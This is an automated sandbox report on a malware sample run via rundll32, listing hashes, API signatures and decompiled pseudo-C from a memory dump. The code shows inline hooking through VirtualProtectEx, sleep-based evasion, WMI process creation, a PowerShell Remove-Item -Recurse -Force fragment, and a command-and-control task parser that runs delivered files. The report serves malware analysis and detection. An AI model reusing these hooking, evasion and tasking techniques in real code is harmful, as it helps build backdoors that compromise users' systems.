                                        • Instruction Fuzzy Hash: 7E11793030079046FF79A722AD5D3ABA1F59B68BD0F024528AD5A07FDAEE6CC857C200
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction ID: 195fb9a972849eb4d24e525b161a3e6d7ac61de208f86d16d43d083ebb4760fb
                                        • Opcode Fuzzy Hash: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction Fuzzy Hash: 4FF0E27661AF5089EB90CB22E84938E33E5F79C740F424139DA9D86B14EE398525CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E0000021E21EF301B4BC(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
                                        				long long _v40;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed char _t56;
                                        				int _t61;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t73;
                                        				void* _t78;
                                        				signed char _t88;
                                        				signed long long _t92;
                                        				long long _t94;
                                        				void* _t97;
                                        				signed long long _t107;
                                        				intOrPtr* _t108;
                                        				signed long long _t109;
                                        				intOrPtr* _t111;
                                        				void* _t117;
                                        				long long _t118;
                                        				void* _t119;
                                        				long long _t120;
                                        				char* _t126;
                                        				intOrPtr* _t128;
                                        
                                        				_a8 = __rbx;
                                        				_a32 = __r9;
                                        				_a24 = __r8;
                                        				r9d = r9d | 0xffffffff;
                                        				r10d = 0;
                                        				_t118 = __rdx;
                                        				_t97 = __rcx;
                                        				if ( *0xf320b514 - r10d <= 0) goto 0xf301b546;
                                        				_t107 = __rax * 0x3c;
                                        				_t92 =  *0xf320b508;
                                        				if ( *((char*)(_t107 + _t92)) == 0) goto 0xf301b533;
                                        				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0xf301b533;
                                        				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
                                        				r8d = 0;
                                        				_t78 =  *_t108 - r8d;
                                        				if (_t78 <= 0) goto 0xf301b52d;
                                        				asm("lock bts dword [ecx+edx+0x4], 0x0");
                                        				if (_t78 >= 0) goto 0xf301b52a;
                                        				r8d = r8d + 1;
                                        				if (r8d -  *_t108 < 0) goto 0xf301b510;
                                        				goto 0xf301b52d;
                                        				r9d = r8d;
                                        				if (r9d != 0xffffffff) goto 0xf301b541;
                                        				r10d = r10d + 1;
                                        				if (r10d -  *0xf320b514 < 0) goto 0xf301b4e8;
                                        				if (_t108 != 0) goto 0xf301b566;
                                        				E0000021E21EF301B7D8(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
                                        				_t109 = _t92;
                                        				if (_t92 == 0) goto 0xf301b56a;
                                        				 *_t92 = 0x42;
                                        				r9d = 0;
                                        				 *((intOrPtr*)(_t92 + 4)) = 1;
                                        				 *(_t97 + 0x38) = r9d;
                                        				 *(_t97 + 0x30) = _t109;
                                        				if (_t109 != 0) goto 0xf301b57a;
                                        				goto 0xf301b68e;
                                        				r8d = 0x2c;
                                        				_t117 = _t92 * 0x3e + _t109;
                                        				_t13 = _t117 + 0x16; // 0x16
                                        				_t120 = _t13;
                                        				E0000021E21EF301B77C(0x90, _t120);
                                        				_t56 = E0000021E21EF301C02C(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
                                        				 *(_t97 + 9) = _t56 & 0x000000ff;
                                        				if (_t56 != 0) goto 0xf301b5b4;
                                        				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
                                        				goto 0xf301b573;
                                        				_t111 =  *((intOrPtr*)(_t97 + 1));
                                        				_t126 = _t97 + 0xa;
                                        				if (_t126 == 0) goto 0xf301b5da;
                                        				if (_t111 == 0) goto 0xf301b5da;
                                        				_t88 = _t56;
                                        				if (_t88 == 0) goto 0xf301b5da;
                                        				 *_t126 =  *_t111;
                                        				if (_t88 != 0) goto 0xf301b5ca;
                                        				 *((long long*)(_t97 + 0x28)) = _t118;
                                        				_t21 = _t117 + 4; // 0x4
                                        				 *0xf320b290 = _t120;
                                        				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
                                        				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
                                        				r9d = 0x40;
                                        				 *((short*)(_t117 + 8)) = 0x25ff;
                                        				 *((long long*)(_t117 + 0xe)) = 0x21ef2fe7660;
                                        				r8d =  *(_t97 + 9) & 0x000000ff;
                                        				_t94 =  &_a32;
                                        				_v40 = _t94;
                                        				_a24 = 0xe9;
                                        				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
                                        				if (_t61 == 0) goto 0xf301b5ae;
                                        				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
                                        				 *((short*)(_t117 + 0x34)) = 0x25ff;
                                        				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
                                        				_t128 =  *((intOrPtr*)(_t97 + 1));
                                        				if (_t128 == 0) goto 0xf301b668;
                                        				 *_t128 = _a24;
                                        				 *((char*)(_t128 + 4)) = _a28;
                                        				r8d =  *(_t97 + 9) & 0x000000ff;
                                        				r9d = _a32;
                                        				_v40 =  &_a32;
                                        				VirtualProtectEx(??, ??, ??, ??, ??); // executed
                                        				return 1;
                                        			}



























                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction ID: 4b5affae79b5485d900d2c516c4b0a7c5c971441ea14eeb0c43142cc8c83b2ed
                                        • Opcode Fuzzy Hash: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction Fuzzy Hash: 7851E7B22057808AEF50DF25E94879A7BA1F764B94F45A212CF5807FDADB3CC452C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FE9060() {
                                        				void* _t3;
                                        				long _t7;
                                        				void* _t20;
                                        				signed int _t21;
                                        
                                        				_t3 = E0000021E21EF301DF60(_t21); // executed
                                        				if (_t3 != 0) goto 0xf2fe90ac;
                                        				r8d = E0000021E21EF3111C60(_t20);
                                        				r8d = r8d - ((r8d - (0x86186187 * r8d >> 0x20) >> 1) + (0x86186187 * r8d >> 0x20) >> 4) * 0x15;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??); // executed
                                        				_t7 = SleepEx(??, ??); // executed
                                        				if (_t7 == 0) goto 0xf2fe9070;
                                        				ExitProcess(??);
                                        			}








                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 59e923e2e4e7e70a8320ca0915166019d36061a5bfecac1658bbf2b55990c359
                                        • Instruction ID: 6c0e1caf97f1feb5386657388686978d012e7b66e08ae11a3e594acfd9a0377f
                                        • Opcode Fuzzy Hash: 59e923e2e4e7e70a8320ca0915166019d36061a5bfecac1658bbf2b55990c359
                                        • Instruction Fuzzy Hash: 8B014F32201FC099FB75AF75AC487DA27E4E794B24F1606599D650AED9CF38C192D210
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FE59D0(void* __rax) {
                                        				void* _v424;
                                        				void* _t9;
                                        
                                        				E0000021E21EF310BA74(_t9, __rax);
                                        				asm("lock xadd [0x225c40], eax");
                                        				if (1 != 1) goto 0xf2fe5a0b;
                                        				__imp__#115(); // executed
                                        				 *0xf320b634 = 2;
                                        				return  *0xf320b634;
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup_onexit
                                        • String ID:
                                        • API String ID: 3012808385-0
                                        • Opcode ID: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction ID: 820fd3313e5c49825e349d37be512cde3de641ef6778d694b02f8d8040f4b453
                                        • Opcode Fuzzy Hash: f80053a0be1704bd1f2324de440d2160bba4a7bdb83e0f02692eb67ed97eb85f
                                        • Instruction Fuzzy Hash: 2CE0463196109186FF20AB10EC883D923A0F3A5B05F828420CD1682AA4DF1CC60FCB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmp
                                        • String ID:
                                        • API String ID: 1534048567-0
                                        • Opcode ID: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction ID: 62563edcf8cc186a95db52ff6417fd1425197ecbfcaa5f0ee284929383ac4f0c
                                        • Opcode Fuzzy Hash: 712ea7422294f85eee90d18edfa9bbc4007d45bd4d2038063b56021a9ba7c6b9
                                        • Instruction Fuzzy Hash: AE41B232205564A7DE24DF45EC087BE73A1F764B88F2984329E8643E46EB7CE8D2D704
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0000021E21EF3122114(void* __eax, signed int __rcx, signed int __rdx) {
                                        				void* __rbx;
                                        				intOrPtr* _t22;
                                        				signed int _t29;
                                        
                                        				_t29 = __rdx;
                                        				if (__rcx == 0) goto 0xf3122133;
                                        				_t1 = _t29 - 0x20; // -32
                                        				_t22 = _t1;
                                        				if (_t22 - __rdx < 0) goto 0xf3122176;
                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                        				goto 0xf312215a;
                                        				if (E0000021E21EF3130330() == 0) goto 0xf3122176;
                                        				if (E0000021E21EF3125368(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xf3122176;
                                        				HeapAlloc(??, ??, ??); // executed
                                        				if (_t22 == 0) goto 0xf3122145;
                                        				goto 0xf3122183;
                                        				E0000021E21EF3118984(_t22);
                                        				 *_t22 = 0xc;
                                        				return 0;
                                        			}







                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction ID: 0bec6a145d7f302076f93feb4a0861d23fcec94795d652a5f14520f21023063d
                                        • Opcode Fuzzy Hash: 43535b9866986d02a1fe364ae6e00c58a0a00d596ad5376eedc1b5b782362f28
                                        • Instruction Fuzzy Hash: 04F0907430124586FEB857619D5CBEB52F16BF8B80F0E84340E0A86FD1EE6CC987C210
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0000021E21EF2FEAE60(void* __edx, long long __rax, void* __rcx, char _a16) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				void* _t25;
                                        				long long _t31;
                                        				void* _t32;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t35;
                                        				void* _t37;
                                        
                                        				_t33 = __rcx;
                                        				_a16 = 0;
                                        				if (__edx != 1) goto 0xf2feaf05;
                                        				asm("o16 nop [eax+eax]");
                                        				 *0xf320b29c = 1;
                                        				if ( *0xf320b29c == 1) goto 0xf2feae80;
                                        				if ( *0xf320b508 == 0) goto 0xf2feaea4;
                                        				 *0xf320b29c = 0;
                                        				goto 0xf2feaed4;
                                        				r8d = 0x3000;
                                        				_t4 = _t33 + 4; // 0x4, executed
                                        				r9d = _t4;
                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                        				 *0xf320b514 = 0xa;
                                        				 *0xf320b508 = __rax;
                                        				 *0xf320b29c = 0;
                                        				E0000021E21EF301B69C(_t25, __rax, _t32, _t34, _t37); // executed
                                        				_t31 =  &_a16;
                                        				r9d = 0;
                                        				_v16 = _t31;
                                        				_v24 = 0;
                                        				E0000021E21EF3111DF0(0, 0, _t31, _t32, _t33, _t35, 0x21ef2fe90c0, _t37); // executed
                                        				 *0xf320b4a8 = _t31;
                                        				return 1;
                                        			}













                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction ID: 5bb24ec3285797301408faaa4b043eb7b91d189f71a9a5049d871ee1199bf9e5
                                        • Opcode Fuzzy Hash: b60a376931d8a9ec50f99d8b90342c7d32a75808f1e187032b81d972682d7886
                                        • Instruction Fuzzy Hash: EF1184B1610A4089FF269B24EC1D3CE3BE0E7A9700F524069CD4A57FA0DB3DC586CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0000021E21EF3122878(intOrPtr* __rax, void* __rcx) {
                                        				void* __rbx;
                                        
                                        				if (__rcx - 0xffffffe0 > 0) goto 0xf31228c3;
                                        				_t16 =  ==  ? __rax : __rcx;
                                        				goto 0xf31228aa;
                                        				if (E0000021E21EF3130330() == 0) goto 0xf31228c3;
                                        				if (E0000021E21EF3125368(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0xf31228c3;
                                        				HeapAlloc(??, ??, ??); // executed
                                        				if (__rax == 0) goto 0xf3122895;
                                        				goto 0xf31228d0;
                                        				E0000021E21EF3118984(__rax);
                                        				 *__rax = 0xc;
                                        				return 0;
                                        			}





                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap
                                        • String ID:
                                        • API String ID: 4292702814-0
                                        • Opcode ID: 522302db02cbdf1fabb929298b9b06228762cc72d666977f0e0c0ab7cf15266b
                                        • Instruction ID: 0c8a8e41951517b927d920543bc860c6fe9273ca68e2a68c0f0c4bacafae4893
                                        • Opcode Fuzzy Hash: 522302db02cbdf1fabb929298b9b06228762cc72d666977f0e0c0ab7cf15266b
                                        • Instruction Fuzzy Hash: FDF08C3071024485FEB86AB19C4CBEB52F05BA8BA0F0E46245C268ABC1DA6CC487C620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearVariant_com_issue_error$Free$BlanketConvertCreateInstanceProxy_com_util::
                                        • String ID: CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$Win32_Process$Win32_ProcessStartup
                                        • API String ID: 3916112548-2022159726
                                        • Opcode ID: f56af8a6d742f1f211c76e8795fa86192bef51715b47295cc53a27ad5f5e518e
                                        • Instruction ID: c72468c61f221b5534296dea42fe9ada5c4d18f80efbe3431da1a19861146645
                                        • Opcode Fuzzy Hash: f56af8a6d742f1f211c76e8795fa86192bef51715b47295cc53a27ad5f5e518e
                                        • Instruction Fuzzy Hash: E4F13936200B8486EB20DF65E89839E77B0F798B98F564126DE8D87F68DF38C559C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpeciallstrcat$OpenThread32$CloseCreateFirstHandleNextProcessSleepSnapshotThreadToolhelp32
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$\wab.exe$dex$dij$ins$powershell$sdl$shi
                                        • API String ID: 2634534522-900435803
                                        • Opcode ID: e8b7e3fb0749116fec9bcf7d2d005833644aa7fddb3248d2c7821ce926249707
                                        • Instruction ID: 828d3a34eff3b1dadcfc8d05e3783c4ddb323501f03c7184fe7e40782fdefb53
                                        • Opcode Fuzzy Hash: e8b7e3fb0749116fec9bcf7d2d005833644aa7fddb3248d2c7821ce926249707
                                        • Instruction Fuzzy Hash: E0429F72220E8685FF21EB64DC4C3DE23A1F761744F8205569E5A5BEEADF78C586C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E0000021E21EF2FE9B30() {
                                        				void* _t300;
                                        				signed int _t333;
                                        				void* _t336;
                                        				void* _t338;
                                        				void* _t358;
                                        				signed int _t375;
                                        				void* _t380;
                                        				void* _t384;
                                        				void* _t421;
                                        				signed char _t423;
                                        				signed char _t430;
                                        				signed char _t434;
                                        				void* _t462;
                                        				void* _t466;
                                        				signed long long _t570;
                                        				signed long long _t573;
                                        				signed long long _t575;
                                        				signed long long _t578;
                                        				signed int* _t582;
                                        				signed long long _t584;
                                        				signed long long _t587;
                                        				signed long long _t589;
                                        				signed long long _t591;
                                        				signed long long _t594;
                                        				signed long long _t596;
                                        				signed long long _t598;
                                        				signed long long _t601;
                                        				signed long long _t603;
                                        				signed long long _t606;
                                        				signed long long _t608;
                                        				intOrPtr _t614;
                                        				intOrPtr _t616;
                                        				intOrPtr _t617;
                                        				long long _t619;
                                        				intOrPtr _t620;
                                        				intOrPtr _t622;
                                        				intOrPtr _t623;
                                        				intOrPtr _t625;
                                        				intOrPtr _t626;
                                        				intOrPtr _t628;
                                        				void* _t631;
                                        				signed long long _t632;
                                        				signed long long _t634;
                                        				signed long long _t636;
                                        				signed long long _t638;
                                        				signed long long _t640;
                                        				signed long long _t642;
                                        				void* _t644;
                                        				intOrPtr _t648;
                                        				intOrPtr _t694;
                                        				void* _t695;
                                        				intOrPtr _t697;
                                        				void* _t698;
                                        				intOrPtr _t721;
                                        				void* _t722;
                                        				intOrPtr _t732;
                                        				void* _t733;
                                        				intOrPtr _t735;
                                        				void* _t736;
                                        				void* _t753;
                                        				long long _t807;
                                        				intOrPtr _t809;
                                        				void* _t810;
                                        				void* _t811;
                                        				signed long long _t815;
                                        				intOrPtr _t817;
                                        				long long* _t818;
                                        				void* _t819;
                                        				signed long long _t822;
                                        				signed long long _t825;
                                        				signed long long _t829;
                                        				void* _t849;
                                        				void* _t857;
                                        				long long _t860;
                                        				signed long long _t861;
                                        				signed long long _t862;
                                        				long long _t863;
                                        				signed long long _t864;
                                        				long long _t866;
                                        
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t300, _t421, _t631 + 0x48), _t421, _t631 + 0x28), _t421, _t631);
                                        				_t632 = _t631 + 0x70;
                                        				 *(_t818 + 8) = _t632;
                                        				if (_t632 != _t811) goto 0xf2fe9b30;
                                        				_t860 = _t807;
                                        				 *((long long*)(_t818 - 0x28)) = _t807;
                                        				if ( *((short*)(_t818 + 0xce)) != 3) goto 0xf2fea70b;
                                        				_t570 =  *(_t818 + 0xc8) & 0xffffffff;
                                        				_t634 = (_t632 << 5) + _t570;
                                        				_t8 = _t818 + 0x338; // 0x33b
                                        				_t9 = _t818 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t462, _t634, _t9, _t8, 0xffffffff, _t818, "response_status");
                                        				if ( *_t570 == _t634) goto 0xf2fe9c02;
                                        				 *(_t818 + 0x40) = _t570;
                                        				 *(_t818 + 0x48) = _t570;
                                        				 *((short*)(_t818 + 0x4e)) = 0x405;
                                        				_t573 =  *(_t818 + 0x48) & 0x00000000 | "response_status";
                                        				 *(_t818 + 0x48) = _t573;
                                        				 *(_t818 + 0x40) = 0xf;
                                        				E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x40, _t807, 0xffffffff, _t818, _t860, _t864);
                                        				r12d =  *_t573;
                                        				 *((intOrPtr*)(_t818 + 0x5e0)) = r12d;
                                        				_t575 =  *(_t818 + 0xc8) & 0xffffffff;
                                        				_t636 = (_t634 << 5) + _t575;
                                        				_t21 = _t818 + 0x340; // 0x343
                                        				_t22 = _t818 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t462, _t636, _t22, _t21, 0xffffffff, _t818, "tasks");
                                        				if ( *_t575 == _t636) goto 0xf2fea155;
                                        				 *(_t818 + 0x30) = _t575;
                                        				 *(_t818 + 0x38) = _t575;
                                        				 *((short*)(_t818 + 0x3e)) = 0x405;
                                        				_t578 =  *(_t818 + 0x38) & 0x00000000 | "tasks";
                                        				 *(_t818 + 0x38) = _t578;
                                        				 *(_t818 + 0x30) = 5;
                                        				E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x30, _t807, 0, _t818, _t860, _t864);
                                        				if ( *((short*)(_t578 + 0xe)) != 4) goto 0xf2fea155;
                                        				 *(_t818 + 0x70) = _t578;
                                        				 *(_t818 + 0x78) = _t578;
                                        				 *((short*)(_t818 + 0x7e)) = 0x405;
                                        				 *(_t818 + 0x78) =  *(_t818 + 0x78) & 0x00000000 | "tasks";
                                        				 *(_t818 + 0x70) = 5;
                                        				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t818 + 0xc0, _t818 + 0x70, _t807, 0, _t818, _t860, _t864),  *(_t818 + 0x78) & 0x00000000 | "tasks", _t818 + 0x1c8);
                                        				_t582 =  *((intOrPtr*)(_t818 + 0x1c8));
                                        				_t815 = _t582[2] & 0xffffffff;
                                        				r15d =  *_t582;
                                        				_t866 = (_t864 << 4) + _t815;
                                        				if (_t815 == _t866) goto 0xf2fea152;
                                        				r12d = 0x1000;
                                        				 *(_t818 + 0x250) = _t582;
                                        				 *(_t818 + 0x258) = _t582;
                                        				 *(_t818 + 0x258) = 0xf;
                                        				 *(_t818 + 0x250) = _t582;
                                        				 *((char*)(_t818 + 0x240)) = 0;
                                        				 *(_t818 + 0x278) = _t582;
                                        				 *(_t818 + 0x280) = _t582;
                                        				 *(_t818 + 0x280) = 0xf;
                                        				 *(_t818 + 0x278) = _t582;
                                        				 *((char*)(_t818 + 0x268)) = 0;
                                        				 *(_t818 + 0x298) = _t582;
                                        				 *(_t818 + 0x2a0) = _t582;
                                        				 *(_t818 + 0x2a0) = 0xf;
                                        				 *(_t818 + 0x298) = _t582;
                                        				 *((char*)(_t818 + 0x288)) = 0;
                                        				if ( *((short*)(_t815 + 0xe)) != 3) goto 0xf2fea112;
                                        				_t584 =  *(_t815 + 8) & 0xffffffff;
                                        				_t638 = (_t636 << 5) + _t584;
                                        				_t822 = "task_data";
                                        				E0000021E21EF2FEB470(_t462, _t638, _t815, _t818 + 0x360, _t815, _t818, _t822);
                                        				if ( *_t584 == _t638) goto 0xf2fe9e4e;
                                        				 *(_t818 + 0x80) = _t584;
                                        				 *(_t818 + 0x88) = _t584;
                                        				 *((short*)(_t818 + 0x8e)) = 0x405;
                                        				_t587 =  *(_t818 + 0x88) & 0x00000000 | "task_data";
                                        				 *(_t818 + 0x88) = _t587;
                                        				 *(_t818 + 0x80) = 9;
                                        				E0000021E21EF2FEBA50(_t815, _t818 + 0x80, _t807, _t815, _t818, _t860, _t866);
                                        				if (( *(_t587 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
                                        				_t589 =  *(_t587 + 8) & 0xffffffff;
                                        				if ( *_t589 != 0) goto 0xf2fe9e31;
                                        				r8d = 0;
                                        				goto 0xf2fe9e3f;
                                        				if ( *((char*)(_t589 + (_t822 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
                                        				E0000021E21EF2FE6400(_t638, _t818 + 0x268, _t589, _t815, (_t822 | 0xffffffff) + 1);
                                        				_t591 =  *(_t815 + 8) & 0xffffffff;
                                        				_t640 = (_t638 << 5) + _t591;
                                        				_t825 = "task";
                                        				E0000021E21EF2FEB470(_t462, _t640, _t815, _t818 + 0x348, _t815, _t818, _t825);
                                        				if ( *_t591 == _t640) goto 0xf2fe9f0d;
                                        				 *(_t818 + 0x90) = _t591;
                                        				 *(_t818 + 0x98) = _t591;
                                        				 *((short*)(_t818 + 0x9e)) = 0x405;
                                        				_t594 =  *(_t818 + 0x98) & 0x00000000 | "task";
                                        				 *(_t818 + 0x98) = _t594;
                                        				 *(_t818 + 0x90) = 4;
                                        				E0000021E21EF2FEBA50(_t815, _t818 + 0x90, _t807, _t815, _t818, _t860, _t866);
                                        				if (( *(_t594 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
                                        				_t596 =  *(_t594 + 8) & 0xffffffff;
                                        				if ( *_t596 != 0) goto 0xf2fe9ef0;
                                        				r8d = 0;
                                        				goto 0xf2fe9efe;
                                        				if ( *((char*)(_t596 + (_t825 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
                                        				E0000021E21EF2FE6400(_t640, _t818 + 0x240, _t596, _t815, (_t825 | 0xffffffff) + 1);
                                        				_t598 =  *(_t815 + 8) & 0xffffffff;
                                        				_t642 = (_t640 << 5) + _t598;
                                        				E0000021E21EF2FEB470(_t462, _t642, _t815, _t818 + 0x350, _t815, _t818, "task_id");
                                        				if ( *_t598 == _t642) goto 0xf2fe9f9b;
                                        				 *(_t818 + 0xa0) = _t598;
                                        				 *(_t818 + 0xa8) = _t598;
                                        				 *((short*)(_t818 + 0xae)) = 0x405;
                                        				_t601 =  *(_t818 + 0xa8) & 0x00000000 | "task_id";
                                        				 *(_t818 + 0xa8) = _t601;
                                        				 *(_t818 + 0xa0) = 7;
                                        				E0000021E21EF2FEBA50(_t815, _t818 + 0xa0, _t807, _t815, _t818, _t860, _t866);
                                        				 *((intOrPtr*)(_t818 + 0x260)) =  *_t601;
                                        				_t603 =  *(_t815 + 8) & 0xffffffff;
                                        				_t644 = (_t642 << 5) + _t603;
                                        				_t829 = "file_entry_point";
                                        				E0000021E21EF2FEB470(_t462, _t644, _t815, _t818 + 0x358, _t815, _t818, _t829);
                                        				if ( *_t603 == _t644) goto 0xf2fea05a;
                                        				 *(_t818 + 0xb0) = _t603;
                                        				 *(_t818 + 0xb8) = _t603;
                                        				 *((short*)(_t818 + 0xbe)) = 0x405;
                                        				_t606 =  *(_t818 + 0xb8) & 0x00000000 | "file_entry_point";
                                        				 *(_t818 + 0xb8) = _t606;
                                        				 *(_t818 + 0xb0) = 0x10;
                                        				E0000021E21EF2FEBA50(_t815, _t818 + 0xb0, _t807, _t815, _t818, _t860, _t866);
                                        				if (( *(_t606 + 0xe) & r12w) != 0) goto 0xf2fea033;
                                        				_t608 =  *(_t606 + 8) & 0xffffffff;
                                        				if ( *_t608 != 0) goto 0xf2fea03d;
                                        				r8d = 0;
                                        				goto 0xf2fea04b;
                                        				if ( *((char*)(_t608 + (_t829 | 0xffffffff) + 1)) != 0) goto 0xf2fea041;
                                        				_t333 = E0000021E21EF2FE6400(_t644, _t818 + 0x288, _t608, _t815, (_t829 | 0xffffffff) + 1);
                                        				if (_t818 + 0x240 - _t860 >= 0) goto 0xf2fea0d3;
                                        				if (_t807 - _t818 + 0x240 > 0) goto 0xf2fea0d3;
                                        				if (_t860 !=  *((intOrPtr*)(_t818 - 0x20))) goto 0xf2fea0b1;
                                        				E0000021E21EF2FEB0F0(_t333 * (_t818 + 0x240 - _t807), _t818 - 0x30);
